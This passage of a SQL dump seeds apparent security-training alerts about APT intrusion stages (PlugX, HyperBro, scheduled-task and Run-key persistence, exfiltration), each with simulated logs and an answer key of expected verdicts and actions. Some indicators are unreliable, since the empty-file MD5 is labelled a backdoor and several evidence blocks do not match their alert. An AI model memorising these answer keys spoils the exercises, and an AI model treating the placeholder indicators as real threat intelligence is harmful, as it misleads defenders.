Calypso APT.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable used in ProxyLogon exploitation attempts.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin@governmentagency.gov\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate email user targeted by exploitation attempt.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1188, 'Deploying PlugX Malware', 'high', 'Endpoint Detection and Response (EDR)', 'Following initial access, the threat actors deploy a variant of PlugX malware, which allows for remote command execution and control.', 'Malware Execution', 'T1203 - Exploitation for Client Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"event_id\":\"evt-5682\",\"event_type\":\"malware_execution\",\"user\":\"jdoe\",\"host\":\"WIN-7K3J4M6\",\"internal_ip\":\"192.168.1.105\",\"external_ip\":\"203.0.113.45\",\"filename\":\"plugx_loader.exe\",\"file_hash\":\"3f8a72d8b6b9c3b9f0a2a1b7b8c1c9d8\",\"process_id\":4729,\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\plugx_loader.exe\",\"parent_process\":\"explorer.exe\",\"malware_family\":\"PlugX\"}', '2026-02-07 21:23:06', '2026-02-22 18:24:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with PlugX distribution.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"plugx_loader.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"PlugX malware executable used to establish control.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3f8a72d8b6b9c3b9f0a2a1b7b8c1c9d8\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash registry\",\"verdict\":\"malicious\",\"details\":\"Hash associated with PlugX malware variant.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal user database\",\"verdict\":\"clean\",\"details\":\"Legitimate user account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1189, 'Maintaining Persistence with Backdoor - System Compromise', 'high', 'System Logs', 'Advanced persistent threat (APT) actors have installed a backdoor to maintain long-term access to the compromised system. The backdoor is designed to automatically reconnect to the command and control (C2) server upon system reboot.', 'Persistence', 'T1053.005 - Scheduled Task/Job: Scheduled Task', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:58Z\",\"event_type\":\"Scheduled Task Created\",\"task_name\":\"SystemUpdate\",\"task_action\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"parameters\":\"/c start C:\\\\Users\\\\Public\\\\backdoor.exe\",\"trigger\":\"At system startup\",\"user\":\"COMPANY\\\\admin_user\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"203.0.113.45\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_path\":\"C:\\\\Users\\\\Public\\\\backdoor.exe\"}', '2026-02-07 21:23:06', '2026-02-22 14:58:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with backdoor malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Users\\\\Public\\\\backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File System\",\"verdict\":\"malicious\",\"details\":\"Known backdoor executable.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"COMPANY\\\\admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used during unauthorized task creation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.502Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:58Z\\\",\\\"event_type\\\":\\\"Scheduled Task Created\\\",\\\"task_name\\\":\\\"SystemUpdate\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"parameters\\\":\\\"/c start C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\backdoor.exe\\\",\\\"trigger\\\":\\\"At system startup\\\",\\\"user\\\":\\\"COMPANY\\\\\\\\admin_user\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\backdoor.exe\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.502Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:58Z\\\",\\\"event_type\\\":\\\"Scheduled Task Created\\\",\\\"task_name\\\":\\\"SystemUpdate\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"parameters\\\":\\\"/c start C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\backdoor.exe\\\",\\\"trigger\\\":\\\"At system startup\\\",\\\"user\\\":\\\"COMPANY\\\\\\\\admin_user\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\backdoor.exe\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.502Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:58Z\\\",\\\"event_type\\\":\\\"Scheduled Task Created\\\",\\\"task_name\\\":\\\"SystemUpdate\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"parameters\\\":\\\"/c start C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\backdoor.exe\\\",\\\"trigger\\\":\\\"At system startup\\\",\\\"user\\\":\\\"COMPANY\\\\\\\\admin_user\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\backdoor.exe\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.502Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:58Z\\\",\\\"event_type\\\":\\\"Scheduled Task Created\\\",\\\"task_name\\\":\\\"SystemUpdate\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"parameters\\\":\\\"/c start C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\backdoor.exe\\\",\\\"trigger\\\":\\\"At system startup\\\",\\\"user\\\":\\\"COMPANY\\\\\\\\admin_user\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\backdoor.exe\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.502Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:58Z\\\",\\\"event_type\\\":\\\"Scheduled Task Created\\\",\\\"task_name\\\":\\\"SystemUpdate\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\",\\\"parameters\\\":\\\"/c start C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\backdoor.exe\\\",\\\"trigger\\\":\\\"At system startup\\\",\\\"user\\\":\\\"COMPANY\\\\\\\\admin_user\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\backdoor.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1190, 'Lateral Movement Across Networks', 'high', 'Active Directory Logs', 'Using stolen credentials, the Calypso APT has moved laterally across network segments, gaining access to sensitive departments and expanding their data access scope.', 'Lateral Movement', 'T1078', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-18T14:05:23Z\",\"event_id\":\"4624\",\"computer_name\":\"server-finance.internal.local\",\"user_name\":\"jdoe\",\"logon_type\":\"3\",\"logon_process\":\"NtLmSsp\",\"authentication_package\":\"NTLM\",\"ip_address\":\"192.168.1.102\",\"source_ip\":\"203.0.113.45\",\"domain\":\"internal\",\"workstation_name\":\"workstation-23.internal.local\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"calc.exe\",\"additional_info\":{\"impersonation_level\":\"Impersonation\",\"restricted_admin_mode\":\"No\"}}', '2026-02-07 21:23:06', '2026-02-22 14:55:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File hash associated with Calypso APT\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1191, 'Data Exfiltration via Encrypted Channels', 'critical', 'Network Traffic Analysis', 'In the final stage, the attackers successfully exfiltrated sensitive data using encrypted channels to evade detection, completing their espionage mission. The data was sent to an external IP associated with known malicious activities.', 'Data Exfiltration', 'T1048', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-18T14:23:45Z\",\"source_ip\":\"192.168.10.15\",\"destination_ip\":\"198.51.100.23\",\"protocol\":\"HTTPS\",\"bytes_sent\":5242880,\"encryption\":\"SSL/TLS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"file_hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"filename\":\"financial_report_2023.pdf\",\"username\":\"jdoe\",\"indicator_type\":\"network\",\"event_type\":\"data_exfiltration\",\"tags\":[\"encrypted\",\"sensitive\",\"exfiltration\"]}', '2026-02-07 21:23:06', '2026-02-16 04:57:10', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"malicious_ip_database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known threat actors\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"File hash linked to previous suspicious activity\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_report_2023.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document typically targeted by data theft operations\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1192, 'Suspicious Email with Malicious Payload', 'high', 'Email security gateway logs', 'An email purportedly from a trusted aerospace partner was sent to a key engineer with a malicious payload designed to deploy the HyperBro backdoor. The email originated from an IP linked to known APT27 activity.', 'Phishing', 'T1566.001 - Spearphishing Attachment', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-14T08:23:45Z\",\"email\":{\"from\":\"trusted.partner@example.com\",\"to\":\"john.doe@aerospacecorp.com\",\"subject\":\"New Project Proposal\",\"attachment\":{\"filename\":\"Project_Proposal.pdf.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}},\"network\":{\"src_ip\":\"203.0.113.15\",\"dst_ip\":\"192.168.1.45\"},\"user\":\"john.doe@aerospacecorp.com\"}', '2026-02-07 21:23:28', '2026-02-21 08:11:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"trusted.partner@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"suspicious\",\"details\":\"Email address used in previous spear-phishing campaigns linked to APT27\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known HyperBro backdoor sample\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"MaliciousIPDB\",\"verdict\":\"malicious\",\"details\":\"IP address associated with APT27 command and control servers\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Project_Proposal.pdf.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalSecurityDB\",\"verdict\":\"malicious\",\"details\":\"Executable masquerading as PDF, common tactic in phishing attacks\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe@aerospacecorp.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Targeted employee in the aerospace department\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email with Malicious Payload\",\"date\":\"2026-02-08T19:00:02.507Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1193, 'Execution of HyperBro Backdoor', 'high', 'Endpoint detection and response (EDR) logs', 'Upon clicking the email attachment, the HyperBro backdoor is executed, establishing a persistent foothold on the victim\'s machine to facilitate further operations.', 'Malware Execution', 'T1059 - Command and Scripting Interpreter', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:28:34Z\",\"event_id\":\"EDR1234567\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.101\",\"malware_name\":\"HyperBro\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\Documents\\\\invoice.docx\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"process_id\":6789,\"process_name\":\"Winword.exe\",\"command_line\":\"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE /n \\\"C:\\\\Users\\\\jdoe\\\\Documents\\\\invoice.docx\\\"\",\"network_connections\":[{\"ip\":\"203.0.113.45\",\"port\":443,\"protocol\":\"HTTPS\"}]}', '2026-02-07 21:23:28', '2026-02-21 08:12:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as HyperBro backdoor.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Users\\\\jdoe\\\\Documents\\\\invoice.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Document used as a lure to deploy malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1194, 'Establishing Persistence via Registry Modification', 'high', 'Windows registry audit logs', 'APT27 has modified the registry entry to ensure the HyperBro backdoor reloads after system reboots, maintaining persistent access to the compromised system.', 'Persistence', 'T1547.001 - Registry Run Keys / Startup Folder', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-18T14:45:00Z\",\"event_id\":4657,\"event_type\":\"Registry Value Change\",\"user\":\"admin_user\",\"user_sid\":\"S-1-5-21-3623811015-3361044348-30300820-1013\",\"computer_name\":\"CompromisedHost01\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_value_name\":\"HyperBro\",\"registry_value\":\"\\\"C:\\\\Windows\\\\System32\\\\hyperbro.exe\\\"\",\"process_id\":5123,\"process_name\":\"regedit.exe\",\"network_information\":{\"source_ip\":\"10.0.0.45\",\"destination_ip\":\"203.0.113.42\",\"destination_port\":80},\"file_hash\":\"b5a5b4c7f4e2c5d8a2b0e4c5a6b7c8d9\"}', '2026-02-07 21:23:28', '2026-02-21 16:02:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT27.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b5a5b4c7f4e2c5d8a2b0e4c5a6b7c8d9\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Identified as HyperBro backdoor.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"hyperbro.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Part of the APT27 toolkit.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Audit\",\"verdict\":\"internal\",\"details\":\"Privileged account used in multiple suspicious activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.510Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:45:00Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Value Change\\\",\\\"user\\\":\\\"admin_user\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"computer_name\\\":\\\"CompromisedHost01\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"HyperBro\\\",\\\"registry_value\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\hyperbro.exe\\\\\\\"\\\",\\\"process_id\\\":5123,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"network_information\\\":{\\\"source_ip\\\":\\\"10.0.0.45\\\",\\\"destination_ip\\\":\\\"203.0.113.42\\\",\\\"destination_port\\\":80},\\\"file_hash\\\":\\\"b5a5b4c7f4e2c5d8a2b0e4c5a6b7c8d9\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.510Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T14:45:00Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Value 